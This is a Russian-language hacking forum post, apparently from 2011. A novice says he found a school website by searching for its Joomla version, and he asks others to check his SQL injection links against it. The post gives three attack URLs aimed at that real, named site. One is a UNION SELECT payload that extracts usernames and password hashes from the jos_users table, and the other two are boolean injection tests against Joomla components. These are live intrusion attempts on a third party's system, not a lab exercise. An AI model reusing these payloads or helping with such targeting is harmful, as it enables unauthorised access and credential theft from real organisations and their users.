Показать сообщение отдельно

  #9  
Старый 04.03.2011, 18:34
DieWithMe
Новичок
Регистрация: 25.02.2011
Сообщений: 5
С нами: 8006006

Репутация: 0
По умолчанию

Судя по первому абзацу все-же сканер врет...

Сайт нагуглил по версии джумлы, вот линки на предполагаемые уязвимости

liceum9.ru/index.php?option=com_comprofiler&task=userProfile& user=1+and+1=2 юзеры начинаются с id 121, для их просмотра пришлось зарегится.

http://www.liceum9.ru/index.php?option=com_content&task=blogcategory&id= 60&Itemid=%2099999%20union%20select%201,concat_ws% 280x3a,username,password%29,%203,4,5%20from%20jos_ users/*

http://www.liceum9.ru/index.php?option=com_banners&task=archivesection&i d='0'+and+'1'='2

В последнем вообще валидный id подобрать не смог...

Проверьте, пожалуйста, эти ссылки на sql-уязвимость. Очень хочется, чтобы первый блин не вышел комом.
 
Ответить с цитированием